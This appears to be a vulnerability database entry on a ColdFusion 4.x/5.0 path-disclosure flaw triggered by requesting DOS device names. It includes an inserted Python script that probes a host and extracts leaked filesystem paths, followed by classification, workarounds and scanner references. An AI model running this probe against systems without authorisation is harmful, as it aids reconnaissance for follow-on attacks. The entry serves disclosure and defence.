Info
Last Modified: 5 months ago
Description
ColdFusion allows a remote attacker to learn the physical path of the web server's document root. When a URL whose file name is a reserved DOS device name such as "nul" or "prn" is requested, the server returns a ColdFusion error page that includes the physical filesystem path from which the web server runs. The disclosed path can be used to launch more focused follow-on attacks, for example ones that require an absolute path on the target.
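The check the entry implies, written out as an added example (it is not the entry's own text, nor the Nikto or Nessus plugin code referenced below): it requests each reserved DOS device name as a page and scans the response body for a Windows filesystem path. The ".cfm" extension on the probe URLs, the ColdFusion-behind-IIS setup, and the sample response bodies are assumptions; the sample bodies are constructed, not captured from a real server.

```python
"""Probe for the ColdFusion DOS-device-name path disclosure described above.

Added example, not code from the OSVDB entry, Nikto or Nessus.
Assumptions not stated on the page: the server is ColdFusion behind IIS,
the probe URLs take the form http://host/<device>.cfm, and a leaked path
looks like a Windows drive path (C:\\...) or a UNC path (\\\\server\\...).
"""
import re
import urllib.error
import urllib.request
from typing import Dict, List

# The entry names "nul" and "prn"; the rest are the other reserved DOS device
# names, included so the check covers the whole family.
DEVICE_NAMES = ["nul", "prn", "con", "aux", "com1", "lpt1"]

# Windows drive path (C:\...) or UNC path (\\server\share\...), read up to
# whitespace, a quote or an HTML tag boundary.
_WIN_PATH_RE = re.compile(r'(?:[A-Za-z]:\\|\\\\[\w.-]+\\)[^\s"\'<>]*')


def probe_urls(base_url: str, extension: str = ".cfm") -> List[str]:
    """Build one probe URL per device name, e.g. http://host/nul.cfm (assumed form)."""
    base = base_url.rstrip("/")
    return [f"{base}/{name}{extension}" for name in DEVICE_NAMES]


def extract_physical_paths(body: str) -> List[str]:
    """Return the distinct Windows paths found in an error page, in order of appearance."""
    found: List[str] = []
    for match in _WIN_PATH_RE.finditer(body):
        path = match.group(0).rstrip(".,;:)")  # drop sentence punctuation glued to the path
        if path not in found:
            found.append(path)
    return found


def fetch_body(url: str, timeout: float = 10.0) -> str:
    """GET a URL and return the body even on 4xx/5xx: the error page is what leaks."""
    req = urllib.request.Request(url, headers={"User-Agent": "cf-device-path-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("latin-1", errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("latin-1", errors="replace")


def check_host(base_url: str) -> Dict[str, List[str]]:
    """Probe each device name; a non-empty list for any URL means the path is disclosed."""
    results: Dict[str, List[str]] = {}
    for url in probe_urls(base_url):
        try:
            results[url] = extract_physical_paths(fetch_body(url))
        except (urllib.error.URLError, OSError):
            results[url] = []  # unreachable or closed: no evidence either way, not "safe"
    return results


# Constructed sample of the kind of ColdFusion error page the entry describes
# (not a real capture); a hardened server should instead answer like SAMPLE_CLEAN.
SAMPLE_LEAK = (
    "<html><head><title>Error Occurred While Processing Request</title></head>"
    "<body><b>Error Diagnostic Information</b><br>"
    "Template file not found: C:\\Inetpub\\wwwroot\\nul.cfm.</body></html>"
)
# Constructed generic IIS error body: what the workaround in the Solution produces.
SAMPLE_CLEAN = (
    "<html><head><title>404 Not Found</title></head>"
    "<body>The page cannot be found.</body></html>"
)

if __name__ == "__main__":
    # Offline demonstration; use check_host("http://target/") against a live host.
    print("leak  :", extract_physical_paths(SAMPLE_LEAK))
    print("clean :", extract_physical_paths(SAMPLE_CLEAN))
```

A response that is reachable but contains no Windows path is reported as an empty list; so is a connection failure, which is why `check_host` should be read as "evidence found" rather than "host is safe" when the list is empty.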
Classification
Location: Remote/Network Access Required
Attack Type: Information Disclosure
Impact: Loss of Confidentiality
Exploit: Exploit Available
Disclosure: OSVDB Verified
OSVDB: Web Related
Solution
Currently, there are no known upgrades or patches to correct this issue. The flaw can be mitigated with either of the following workarounds: install the Microsoft URLScan utility, or configure the IIS application mapping for ColdFusion so that IIS verifies the requested file exists (the "Check that file exists" option on the script mapping) and returns an IIS error page, instead of passing the request to ColdFusion, when it does not.
Products
ColdFusion 4.x
ColdFusion 5.0
Tools & Filters
Nikto: 3048, 3049, 3050, 3051
Nessus: 11393
Credit
Unknown or Incomplete